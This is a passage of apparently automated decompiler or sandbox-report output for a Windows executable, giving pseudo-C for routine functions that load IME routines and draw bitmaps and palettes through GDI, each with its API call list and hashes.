                                                                                					 *[fs:eax] = _t44;
                                                                                					if( *0x487bb8 == 0) {
                                                                                						 *0x487bb8 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
                                                                                					}
                                                                                					if( *0x46b9fc == 0) {
                                                                                						 *0x46b9fc = LoadLibraryA("IMM32.DLL");
                                                                                						if( *0x46b9fc != 0) {
                                                                                							_t11 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bbc = GetProcAddress(_t11, "ImmGetContext");
                                                                                							_t13 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bc0 = GetProcAddress(_t13, "ImmReleaseContext");
                                                                                							_t15 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bc4 = GetProcAddress(_t15, "ImmGetConversionStatus");
                                                                                							_t17 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bc8 = GetProcAddress(_t17, "ImmSetConversionStatus");
                                                                                							_t19 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bcc = GetProcAddress(_t19, "ImmSetOpenStatus");
                                                                                							_t21 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bd0 = GetProcAddress(_t21, "ImmSetCompositionWindow");
                                                                                							_t23 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bd4 = GetProcAddress(_t23, "ImmSetCompositionFontA");
                                                                                							_t25 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bd8 = GetProcAddress(_t25, "ImmGetCompositionStringA");
                                                                                							_t27 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bdc = GetProcAddress(_t27, "ImmIsIME");
                                                                                							_t29 =  *0x46b9fc; // 0x0
                                                                                							 *0x487be0 = GetProcAddress(_t29, "ImmNotifyIME");
                                                                                						}
                                                                                					}
                                                                                					_pop(_t40);
                                                                                					 *[fs:eax] = _t40;
                                                                                					_push(0x440731);
                                                                                					return SetErrorMode(_v8);
                                                                                				}
                                                                                			}



















                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00008000), ref: 004405DD
                                                                                • GetModuleHandleA.KERNEL32(USER32,00000000,0044072A,?,00008000), ref: 00440601
                                                                                • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0044060E
                                                                                • LoadLibraryA.KERNEL32(IMM32.DLL,00000000,0044072A,?,00008000), ref: 0044062A
                                                                                • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0044064C
                                                                                • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00440661
                                                                                • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00440676
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0044068B
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004406A0
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004406B5
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004406CA
                                                                                • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004406DF
                                                                                • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 004406F4
                                                                                • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440709
                                                                                • SetErrorMode.KERNEL32(?,00440731,00008000), ref: 00440724
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                                • String ID: IMM32.DLL$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME
                                                                                • API String ID: 3397921170-3271328588
                                                                                • Opcode ID: a215f9482aca3cc701cffad9bd2f85d0981100ccb56e893b3e39329e0a459fdd
                                                                                • Instruction ID: 0cf64c75a47a1564bac7c0c751d74d83d05284642008fa8f65c16265756f8fe4
                                                                                • Opcode Fuzzy Hash: a215f9482aca3cc701cffad9bd2f85d0981100ccb56e893b3e39329e0a459fdd
                                                                                • Instruction Fuzzy Hash: A83125F1E453406EE700EB66EC56A1A37A8E704714B21C83FF601D7292D7BCA8649F9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E00420360(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                                                                                				int _v8;
                                                                                				int _v12;
                                                                                				char _v13;
                                                                                				struct HDC__* _v20;
                                                                                				void* _v24;
                                                                                				void* _v28;
                                                                                				long _v32;
                                                                                				long _v36;
                                                                                				struct HPALETTE__* _v40;
                                                                                				intOrPtr* _t78;
                                                                                				struct HPALETTE__* _t89;
                                                                                				struct HPALETTE__* _t95;
                                                                                				int _t171;
                                                                                				intOrPtr _t178;
                                                                                				intOrPtr _t180;
                                                                                				struct HDC__* _t182;
                                                                                				int _t184;
                                                                                				void* _t186;
                                                                                				void* _t187;
                                                                                				intOrPtr _t188;
                                                                                
                                                                                				_t186 = _t187;
                                                                                				_t188 = _t187 + 0xffffffdc;
                                                                                				_v12 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t182 = __eax;
                                                                                				_t184 = _a16;
                                                                                				_t171 = _a20;
                                                                                				_v13 = 1;
                                                                                				_t78 =  *0x486dc8; // 0x46b0ac
                                                                                				if( *_t78 != 2 || _t171 != _a40 || _t184 != _a36) {
                                                                                					_v40 = 0;
                                                                                					_v20 = E004201BC(CreateCompatibleDC(0));
                                                                                					_push(_t186);
                                                                                					_push(0x4205e0);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t188;
                                                                                					_v24 = E004201BC(CreateCompatibleBitmap(_a32, _t171, _t184));
                                                                                					_v28 = SelectObject(_v20, _v24);
                                                                                					_t89 =  *0x487a28; // 0xf50806b6
                                                                                					_v40 = SelectPalette(_a32, _t89, 0);
                                                                                					SelectPalette(_a32, _v40, 0);
                                                                                					if(_v40 == 0) {
                                                                                						_t95 =  *0x487a28; // 0xf50806b6
                                                                                						_v40 = SelectPalette(_v20, _t95, 0xffffffff);
                                                                                					} else {
                                                                                						_v40 = SelectPalette(_v20, _v40, 0xffffffff);
                                                                                					}
                                                                                					RealizePalette(_v20);
                                                                                					StretchBlt(_v20, 0, 0, _t171, _t184, _a12, _a8, _a4, _t171, _t184, 0xcc0020);
                                                                                					StretchBlt(_v20, 0, 0, _t171, _t184, _a32, _a28, _a24, _t171, _t184, 0x440328);
                                                                                					_v32 = SetTextColor(_t182, 0);
                                                                                					_v36 = SetBkColor(_t182, 0xffffff);
                                                                                					StretchBlt(_t182, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t171, _t184, 0x8800c6);
                                                                                					StretchBlt(_t182, _v8, _v12, _a40, _a36, _v20, 0, 0, _t171, _t184, 0x660046);
                                                                                					SetTextColor(_t182, _v32);
                                                                                					SetBkColor(_t182, _v36);
                                                                                					if(_v28 != 0) {
                                                                                						SelectObject(_v20, _v28);
                                                                                					}
                                                                                					DeleteObject(_v24);
                                                                                					_pop(_t178);
                                                                                					 *[fs:eax] = _t178;
                                                                                					_push(E004205E7);
                                                                                					if(_v40 != 0) {
                                                                                						SelectPalette(_v20, _v40, 0);
                                                                                					}
                                                                                					return DeleteDC(_v20);
                                                                                				} else {
                                                                                					_v24 = E004201BC(CreateCompatibleBitmap(_a32, 1, 1));
                                                                                					_v24 = SelectObject(_a12, _v24);
                                                                                					_push(_t186);
                                                                                					_push(0x420433);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t188;
                                                                                					MaskBlt(_t182, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407250(0xaa0029, 0xcc0020));
                                                                                					_pop(_t180);
                                                                                					 *[fs:eax] = _t180;
                                                                                					_push(E004205E7);
                                                                                					_v24 = SelectObject(_a12, _v24);
                                                                                					return DeleteObject(_v24);
                                                                                				}
                                                                                			}
























                                                                                APIs
                                                                                • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 004203A3
                                                                                • SelectObject.GDI32(?,?), ref: 004203B8
                                                                                • MaskBlt.GDI32(?,?,?,?,?,?,00000000,0041F807,?,?,?,00000000,00000000,00420433,?,?), ref: 00420407
                                                                                • SelectObject.GDI32(?,?), ref: 00420421
                                                                                • DeleteObject.GDI32(?), ref: 0042042D
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00420441
                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00420462
                                                                                • SelectObject.GDI32(?,?), ref: 00420477
                                                                                • SelectPalette.GDI32(?,F50806B6,00000000), ref: 0042048B
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 0042049D
                                                                                • SelectPalette.GDI32(?,00000000,000000FF), ref: 004204B2
                                                                                • SelectPalette.GDI32(?,F50806B6,000000FF), ref: 004204C8
                                                                                • RealizePalette.GDI32(?), ref: 004204D4
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004204F6
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,0041F807,?,?,00440328), ref: 00420518
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00420520
                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 0042052E
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0042055A
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0042057F
                                                                                • SetTextColor.GDI32(?,0041F807), ref: 00420589
                                                                                • SetBkColor.GDI32(?,00000000), ref: 00420593
                                                                                • SelectObject.GDI32(?,00000000), ref: 004205A6
                                                                                • DeleteObject.GDI32(?), ref: 004205AF
                                                                                • SelectPalette.GDI32(?,00000000,00000000), ref: 004205D1
                                                                                • DeleteDC.GDI32(?), ref: 004205DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                                                                • String ID:
                                                                                • API String ID: 3976802218-0
                                                                                • Opcode ID: ef88948618eda5008899333fc6243be902a3193d4f5d48222ccf27fb4a7413a6
                                                                                • Instruction ID: e8595f71b62ae0b459171dff56d3c2f5d04765a8323d631b6e7ee7ab11d0db60
                                                                                • Opcode Fuzzy Hash: ef88948618eda5008899333fc6243be902a3193d4f5d48222ccf27fb4a7413a6
                                                                                • Instruction Fuzzy Hash: 0B81B4B1A00219AFDB50EEA9CC81FAF77FCAB0D314F51441AF618F7281C278AD508B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00423754(void* __eax, long __ecx, struct HPALETTE__* __edx) {
                                                                                				struct HBITMAP__* _v8;
                                                                                				struct HDC__* _v12;
                                                                                				struct HDC__* _v16;
                                                                                				struct HDC__* _v20;
                                                                                				char _v21;
                                                                                				void* _v28;
                                                                                				void* _v32;
                                                                                				intOrPtr _v92;
                                                                                				intOrPtr _v96;
                                                                                				int _v108;
                                                                                				int _v112;
                                                                                				void _v116;
                                                                                				int _t68;
                                                                                				long _t82;
                                                                                				void* _t117;
                                                                                				intOrPtr _t126;
                                                                                				intOrPtr _t127;
                                                                                				long _t130;
                                                                                				struct HPALETTE__* _t133;
                                                                                				void* _t137;
                                                                                				void* _t139;
                                                                                				intOrPtr _t140;
                                                                                
                                                                                				_t137 = _t139;
                                                                                				_t140 = _t139 + 0xffffff90;
                                                                                				_t130 = __ecx;
                                                                                				_t133 = __edx;
                                                                                				_t117 = __eax;
                                                                                				_v8 = 0;
                                                                                				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
                                                                                					return _v8;
                                                                                				} else {
                                                                                					E00422C48(_t117);
                                                                                					_v12 = 0;
                                                                                					_v20 = 0;
                                                                                					_push(_t137);
                                                                                					_push(0x42394f);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t140;
                                                                                					_v12 = E004201BC(GetDC(0));
                                                                                					_v20 = E004201BC(CreateCompatibleDC(_v12));
                                                                                					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
                                                                                					if(_v8 == 0) {
                                                                                						L18:
                                                                                						_t68 = 0;
                                                                                						_pop(_t126);
                                                                                						 *[fs:eax] = _t126;
                                                                                						_push(0x423956);
                                                                                						if(_v20 != 0) {
                                                                                							_t68 = DeleteDC(_v20);
                                                                                						}
                                                                                						if(_v12 != 0) {
                                                                                							return ReleaseDC(0, _v12);
                                                                                						}
                                                                                						return _t68;
                                                                                					} else {
                                                                                						_v32 = SelectObject(_v20, _v8);
                                                                                						if(_t130 != 0x1fffffff) {
                                                                                							_v16 = E004201BC(CreateCompatibleDC(_v12));
                                                                                							_push(_t137);
                                                                                							_push(0x423907);
                                                                                							_push( *[fs:eax]);
                                                                                							 *[fs:eax] = _t140;
                                                                                							if(_v96 == 0) {
                                                                                								_v21 = 0;
                                                                                							} else {
                                                                                								_v21 = 1;
                                                                                								_v92 = 0;
                                                                                								_t117 = E0042308C(_t117, _t133, _t133, 0,  &_v116);
                                                                                							}
                                                                                							_v28 = SelectObject(_v16, _t117);
                                                                                							if(_t133 != 0) {
                                                                                								SelectPalette(_v16, _t133, 0);
                                                                                								RealizePalette(_v16);
                                                                                								SelectPalette(_v20, _t133, 0);
                                                                                								RealizePalette(_v20);
                                                                                							}
                                                                                							_t82 = SetBkColor(_v16, _t130);
                                                                                							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
                                                                                							SetBkColor(_v16, _t82);
                                                                                							if(_v28 != 0) {
                                                                                								SelectObject(_v16, _v28);
                                                                                							}
                                                                                							if(_v21 != 0) {
                                                                                								DeleteObject(_t117);
                                                                                							}
                                                                                							_pop(_t127);
                                                                                							 *[fs:eax] = _t127;
                                                                                							_push(0x42390e);
                                                                                							return DeleteDC(_v16);
                                                                                						} else {
                                                                                							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
                                                                                							if(_v32 != 0) {
                                                                                								SelectObject(_v20, _v32);
                                                                                							}
                                                                                							goto L18;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                			}


























                                                                                APIs
                                                                                • GetObjectA.GDI32(00000000,00000054,?), ref: 00423777
                                                                                • GetDC.USER32(00000000), ref: 004237A5
                                                                                • CreateCompatibleDC.GDI32(?), ref: 004237B6
                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 004237D1
                                                                                • SelectObject.GDI32(?,00000000), ref: 004237EB
                                                                                • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0042380D
                                                                                • CreateCompatibleDC.GDI32(?), ref: 0042381B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00423863
                                                                                • SelectPalette.GDI32(00000000,?,00000000), ref: 00423876
                                                                                • RealizePalette.GDI32(00000000), ref: 0042387F
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 0042388B
                                                                                • RealizePalette.GDI32(?), ref: 00423894
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0042389E
                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 004238C2
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 004238CC
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004238DF
                                                                                • DeleteObject.GDI32(00000000), ref: 004238EB
                                                                                • DeleteDC.GDI32(00000000), ref: 00423901
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042391C
                                                                                • DeleteDC.GDI32(00000000), ref: 00423938
                                                                                • ReleaseDC.USER32 ref: 00423949
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                                                • String ID:
                                                                                • API String ID: 332224125-0
                                                                                • Opcode ID: 7c414300d548b624f4b701a6a1d4ce2a0878781e04664db4c8e827d668d4d119
                                                                                • Instruction ID: ad944dd91036beafc7ec954165db9b70d0383b0724a4ea5891ac7e38479d5bc1
                                                                                • Opcode Fuzzy Hash: 7c414300d548b624f4b701a6a1d4ce2a0878781e04664db4c8e827d668d4d119
                                                                                • Instruction Fuzzy Hash: A35162B1F00224ABDB10EFE9DC45BAEB7FCAB09704F51442AB114F7281C6BCA9508B58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00424550(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr* _v12;
                                                                                				struct HDC__* _v16;
                                                                                				struct HDC__* _v20;
                                                                                				void* _v24;
                                                                                				BITMAPINFOHEADER* _v28;
                                                                                				intOrPtr _v32;
                                                                                				intOrPtr _v36;
                                                                                				signed int _v37;
                                                                                				struct HBITMAP__* _v44;
                                                                                				void* _v48;
                                                                                				struct HPALETTE__* _v52;
                                                                                				struct HPALETTE__* _v56;
                                                                                				intOrPtr* _v60;
                                                                                				intOrPtr* _v64;
                                                                                				short _v66;
                                                                                				short _v68;
                                                                                				signed short _v70;
                                                                                				signed short _v72;
                                                                                				void* _v76;
                                                                                				intOrPtr _v172;
                                                                                				char _v174;
                                                                                				intOrPtr _t150;
                                                                                				signed int _t160;
                                                                                				intOrPtr _t164;
                                                                                				signed int _t193;
                                                                                				signed int _t218;
                                                                                				signed short _t224;
                                                                                				intOrPtr _t251;
                                                                                				intOrPtr* _t255;
                                                                                				intOrPtr _t261;
                                                                                				intOrPtr _t299;
                                                                                				intOrPtr _t300;
                                                                                				intOrPtr _t305;
                                                                                				signed int _t307;
                                                                                				signed int _t327;
                                                                                				void* _t329;
                                                                                				void* _t330;
                                                                                				signed int _t331;
                                                                                				void* _t332;
                                                                                				void* _t333;
                                                                                				void* _t334;
                                                                                				intOrPtr _t335;
                                                                                
                                                                                				_t326 = __edi;
                                                                                				_t333 = _t334;
                                                                                				_t335 = _t334 + 0xffffff54;
                                                                                				_t329 = __ecx;
                                                                                				_v12 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_v52 = 0;
                                                                                				_v44 = 0;
                                                                                				_v60 = 0;
                                                                                				 *((intOrPtr*)( *_v12 + 8))(__edi, __esi, __ebx, _t332);
                                                                                				_v37 = _v36 == 0xc;
                                                                                				if(_v37 != 0) {
                                                                                					_v36 = 0x28;
                                                                                				}
                                                                                				_v28 = E0040272C(_v36 + 0x40c);
                                                                                				_v64 = _v28;
                                                                                				_push(_t333);
                                                                                				_push(0x424a6d);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t335;
                                                                                				_push(_t333);
                                                                                				_push(0x424a40);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t335;
                                                                                				if(_v37 == 0) {
                                                                                					 *((intOrPtr*)( *_v12 + 8))();
                                                                                					_t330 = _t329 - _v36;
                                                                                					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                                                                                					if(_t150 != 3 && _t150 != 0) {
                                                                                						_v60 = E00403584(1);
                                                                                						if(_a4 == 0) {
                                                                                							E00402EC8( &_v174, 0xe);
                                                                                							_v174 = 0x4d42;
                                                                                							_v172 = _v36 + _t330;
                                                                                							_a4 =  &_v174;
                                                                                						}
                                                                                						 *((intOrPtr*)( *_v60 + 0xc))();
                                                                                						 *((intOrPtr*)( *_v60 + 0xc))();
                                                                                						 *((intOrPtr*)( *_v60 + 0xc))();
                                                                                						E004162A0(_v60,  *_v60, _v12, _t326, _t330, _t330, 0);
                                                                                						 *((intOrPtr*)( *_v60 + 0x10))();
                                                                                						_v12 = _v60;
                                                                                					}
                                                                                				} else {
                                                                                					 *((intOrPtr*)( *_v12 + 8))();
                                                                                					_t261 = _v64;
                                                                                					E00402EC8(_t261, 0x28);
                                                                                					_t251 = _t261;
                                                                                					 *(_t251 + 4) = _v72 & 0x0000ffff;
                                                                                					 *(_t251 + 8) = _v70 & 0x0000ffff;
                                                                                					 *((short*)(_t251 + 0xc)) = _v68;
                                                                                					 *((short*)(_t251 + 0xe)) = _v66;
                                                                                					_t330 = _t329 - 0xc;
                                                                                				}
                                                                                				_t255 = _v64;
                                                                                				 *_t255 = _v36;
                                                                                				_v32 = _v28 + _v36;
                                                                                				if( *((short*)(_t255 + 0xc)) != 1) {
                                                                                					E0042009C();
                                                                                				}
                                                                                				if(_v36 == 0x28) {
                                                                                					_t224 =  *(_t255 + 0xe);
                                                                                					if(_t224 == 0x10 || _t224 == 0x20) {
                                                                                						if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
                                                                                							E00416230(_v12, 0xc, _v32);
                                                                                							_v32 = _v32 + 0xc;
                                                                                							_t330 = _t330 - 0xc;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				if( *(_t255 + 0x20) == 0) {
                                                                                					 *(_t255 + 0x20) = E0042032C( *(_t255 + 0xe));
                                                                                				}
                                                                                				_t327 = _v37 & 0x000000ff;
                                                                                				_t267 =  *(_t255 + 0x20) * 0;
                                                                                				E00416230(_v12,  *(_t255 + 0x20) * 0, _v32);
                                                                                				_t331 = _t330 -  *(_t255 + 0x20) * 0;
                                                                                				if( *(_t255 + 0x14) == 0) {
                                                                                					_t307 =  *(_t255 + 0xe) & 0x0000ffff;
                                                                                					_t218 = E0042034C( *((intOrPtr*)(_t255 + 4)), 0x20, _t307);
                                                                                					asm("cdq");
                                                                                					_t267 = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
                                                                                					 *(_t255 + 0x14) = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
                                                                                				}
                                                                                				_t160 =  *(_t255 + 0x14);
                                                                                				if(_t331 > _t160) {
                                                                                					_t331 = _t160;
                                                                                				}
                                                                                				if(_v37 != 0) {
                                                                                					E004205F4(_v32);
                                                                                				}
                                                                                				_v16 = E004201BC(GetDC(0));
                                                                                				_push(_t333);
                                                                                				_push(0x4249bb);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t335;
                                                                                				_t164 =  *((intOrPtr*)(_v64 + 0x10));
                                                                                				if(_t164 == 0 || _t164 == 3) {
                                                                                					if( *0x46b514 == 0) {
                                                                                						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0);
                                                                                						if(_v44 == 0 || _v24 == 0) {
                                                                                							if(GetLastError() != 0) {
                                                                                								E0040B264(_t255, _t267, _t327, _t331);
                                                                                							} else {
                                                                                								E0042009C();
                                                                                							}
                                                                                						}
                                                                                						_push(_t333);
                                                                                						_push( *[fs:eax]);
                                                                                						 *[fs:eax] = _t335;
                                                                                						E00416230(_v12, _t331, _v24);
                                                                                						_pop(_t299);
                                                                                						 *[fs:eax] = _t299;
                                                                                						_t300 = 0x42498a;
                                                                                						 *[fs:eax] = _t300;
                                                                                						_push(0x4249c2);
                                                                                						return ReleaseDC(0, _v16);
                                                                                					} else {
                                                                                						goto L27;
                                                                                					}
                                                                                				} else {
                                                                                					L27:
                                                                                					_v20 = 0;
                                                                                					_v24 = E0040272C(_t331);
                                                                                					_push(_t333);
                                                                                					_push(0x424923);
                                                                                					_push( *[fs:edx]);
                                                                                					 *[fs:edx] = _t335;
                                                                                					_t273 = _t331;
                                                                                					E00416230(_v12, _t331, _v24);
                                                                                					_v20 = E004201BC(CreateCompatibleDC(_v16));
                                                                                					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
                                                                                					_v56 = 0;
                                                                                					_t193 =  *(_v64 + 0x20);
                                                                                					if(_t193 > 0) {
                                                                                						_t273 = _t193;
                                                                                						_v52 = E004208AC(0, _t193);
                                                                                						_v56 = SelectPalette(_v20, _v52, 0);
                                                                                						RealizePalette(_v20);
                                                                                					}
                                                                                					_push(_t333);
                                                                                					_push(0x4248f7);
                                                                                					_push( *[fs:edx]);
                                                                                					 *[fs:edx] = _t335;
                                                                                					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
                                                                                					if(_v44 == 0) {
                                                                                						if(GetLastError() != 0) {
                                                                                							E0040B264(_t255, _t273, _t327, _t331);
                                                                                						} else {
                                                                                							E0042009C();
                                                                                						}
                                                                                					}
                                                                                					_pop(_t305);
                                                                                					 *[fs:eax] = _t305;
                                                                                					_push(0x4248fe);
                                                                                					if(_v56 != 0) {
                                                                                						SelectPalette(_v20, _v56, 0xffffffff);
                                                                                					}
                                                                                					return DeleteObject(SelectObject(_v20, _v48));
                                                                                				}
                                                                                 			}

                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 004247BA
                                                                                • CreateCompatibleDC.GDI32(00000001), ref: 0042481F
                                                                                • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 00424834
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042483E
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 0042486E
                                                                                • RealizePalette.GDI32(?), ref: 0042487A
                                                                                • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 0042489E
                                                                                • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,004248F7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004248AC
                                                                                • SelectPalette.GDI32(?,00000000,000000FF), ref: 004248DE
                                                                                • SelectObject.GDI32(?,?), ref: 004248EB
                                                                                • DeleteObject.GDI32(00000000), ref: 004248F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                                                                • String ID: ($0!A$BM
                                                                                • API String ID: 2831685396-1515617234
                                                                                • Opcode ID: 9004de23caba881e76fdc33fc15824efd6e843578893ffe631264b90b5f74ea2
                                                                                • Instruction ID: 460c956ee79e1a374af29936669ac4285e96445d6daf9193b4eb6fa02d8a22bf
                                                                                • Opcode Fuzzy Hash: 9004de23caba881e76fdc33fc15824efd6e843578893ffe631264b90b5f74ea2
                                                                                • Instruction Fuzzy Hash: CED15175B002189FDF04EFA9D885BAEBBF5EF89304F51806AE505E7391D7389840CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
                                                                                			E0046647C(intOrPtr __eax, char __edx) {
                                                                                				intOrPtr _v8;
                                                                                				char _v9;
                                                                                				intOrPtr* _v16;
                                                                                				intOrPtr* _v20;
                                                                                				intOrPtr* _v24;
                                                                                				intOrPtr _v28;
                                                                                				char _v44;
                                                                                				char _v60;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				signed int _t170;
                                                                                				signed int _t176;
                                                                                				void* _t209;
                                                                                				void* _t213;
                                                                                				intOrPtr _t218;
                                                                                				intOrPtr _t241;
